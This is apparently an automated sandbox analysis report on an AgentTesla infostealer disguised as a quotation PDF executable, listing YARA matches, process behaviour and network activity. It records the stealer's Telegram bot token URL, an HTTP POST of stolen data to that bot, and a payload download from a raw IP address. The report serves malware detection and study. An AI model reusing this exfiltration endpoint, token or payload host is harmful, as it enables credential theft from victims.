Source: Quotation-pdf______________________________________.exe, 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocumentdocument-----
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4Tk
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

HTTP traffic detected: POST /bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da23a512591670Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: global traffic

HTTP traffic detected: GET /Toscgshw_Yvmodcuo.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275327401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Quotation-pdf______________________________________.exe
Source: initial sample	Static PE information: Filename: Quotation-pdf______________________________________.exe

.NET source code contains very large array initializations

Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689
Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689
Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689
Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.cs	Large array initialization: .cctor: array initializer size 11689

Source: Quotation-pdf______________________________________.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07F9F938	0_2_07F9F938
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FBED30	0_2_07FBED30
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FDAC81	0_2_07FDAC81
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FD3C48	0_2_07FD3C48
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FD5828	0_2_07FD5828
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FD1AA8	0_2_07FD1AA8
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FD1879	0_2_07FD1879
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_00962050	0_2_00962050
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_00D1F378	4_2_00D1F378
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_00D1F6C0	4_2_00D1F6C0
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_058C9508	4_2_058C9508
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_058CC720	4_2_058CC720
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_058CB9D0	4_2_058CB9D0
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_058C2120	4_2_058C2120
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_058C0040	4_2_058C0040
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F3916F	4_2_05F3916F
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F30CC8	4_2_05F30CC8
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F3B8A8	4_2_05F3B8A8
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F34800	4_2_05F34800
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F39408	4_2_05F39408
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F367A8	4_2_05F367A8
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F33038	4_2_05F33038
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F4E538	4_2_05F4E538
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F4BB70	4_2_05F4BB70
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F44EB0	4_2_05F44EB0
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F49F40	4_2_05F49F40
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F43330	4_2_05F43330
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F4BB0C	4_2_05F4BB0C
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_00452050	4_2_00452050

Source: Quotation-pdf______________________________________.exe, 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.280478444.0000000007E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276539722.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268519442.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000000.228092889.0000000000966000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268963225.0000000004309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275327401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000004.00000000.271351352.0000000000456000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494047607.00000000005E8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494618712.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation-pdf______________________________________.exe
Source: Quotation-pdf______________________________________.exe	Binary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe

Source: Quotation-pdf______________________________________.exe	Virustotal: Detection: 20%
Source: Quotation-pdf______________________________________.exe	ReversingLabs: Detection: 21%

Source: Quotation-pdf______________________________________.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe"
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exe
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation-pdf______________________________________.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/3

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Quotation-pdf______________________________________.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation-pdf______________________________________.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Quotation-pdf______________________________________.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: Quotation-pdf______________________________________.exe, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Quotation-pdf______________________________________.exe.960000.0.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Quotation-pdf______________________________________.exe.960000.0.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.0.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.1.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.3.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.7.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Quotation-pdf______________________________________.exe.450000.1.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.13.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.5.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.9.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.11.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Quotation-pdf______________________________________.exe.450000.2.unpack, Form4.cs	.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_00962AE2 push es; ret	0_2_00962B88
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07F95FA0 push ebx; iretd	0_2_07F95FA1
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07F94269 push 8BFFFFFEh; iretd	0_2_07F9426E
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07F9098F push FFFFFFB0h; ret	0_2_07F90994
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07F91D41 pushfd ; ret	0_2_07F91D42
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 0_2_07FD54D7 push 8BFFFFFEh; retf	0_2_07FD54E9
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_00452AE2 push es; ret	4_2_00452B88
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Code function: 4_2_05F42177 push edi; retn 0000h	4_2_05F42179

Source: Quotation-pdf______________________________________.exe

Static PE information: 0xAF32B78C [Thu Feb 22 02:23:08 2063 UTC]

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
